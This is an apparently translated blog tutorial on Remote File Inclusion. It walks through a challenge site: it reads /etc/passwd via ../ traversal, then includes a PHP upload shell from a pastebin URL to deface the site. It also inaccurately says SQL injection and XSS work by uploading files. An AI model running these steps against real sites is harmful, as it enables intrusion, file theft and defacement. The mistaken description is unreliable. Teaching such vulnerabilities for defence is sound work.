- Tram Ho
Most people have seen a hacked website and changed its interface to anonymous, hacked by abc… .. So how can hackers do that?
Up to now, there are 3 popular ways:
- Reomote File Include (RFI)
- SQL injection
- Cross-site Scripting
Features of all 3 are uploading files, also known as uploading malicious files to the server even PHP, HTML, JS, …. First we come to the first way: Remote File Include (RFI)
The File Inclusion vulnerability allows hackers to gain unauthorized access to sensitive files on the web server or execute malicious files using the “include” function. This vulnerability occurs because the inadequate input checking mechanism makes it possible for hackers to exploit and insert malicious data.
Speech theory is quite vague, people find out in detail in this video
For example, we have this site
Explain as follows: The other PHP page will read the file from photos.php whose page variable has been assigned. Now if the loophole is not properly filtered, the hacker will take advantage of this vulnerability to exploit and read more sensitive files than the password.
Here we try into a google path
abc. com/index.php?page=http:// google.com
Tada, showing google search page
So index.php does not filter input, can we read the password file? Initially I tried etc / passwd
The results did not show anything. Continue to use the path technique on a directory using ../
Still not visible, continue the path
Finally, the whole passwd was revealed after 2 attempts
Not stop here. If you can read any file. Why don’t we try reading a file with the purpose of uploading the file to the server. Prepare 1 file uploadShell.php. Copy the code into pastebin for the purpose of getting the link. After a while, we have 1 link with php code to upload files, the results are as follows:
abc. com/index.php?page=https:// pastebin. com/xyz
Now just need to upload any file only depends on the purpose of the hacker. In the video I want to overwrite the file dispo_call.php, so I created a php file exactly the same but the source code is the interface website notifying that this site has been hacked. Finally succeed, complete the challenge.
I have demonstrated how to hack a website series. If you like songs like this, then look forward to episode 2 of this series.
Source : Techtalk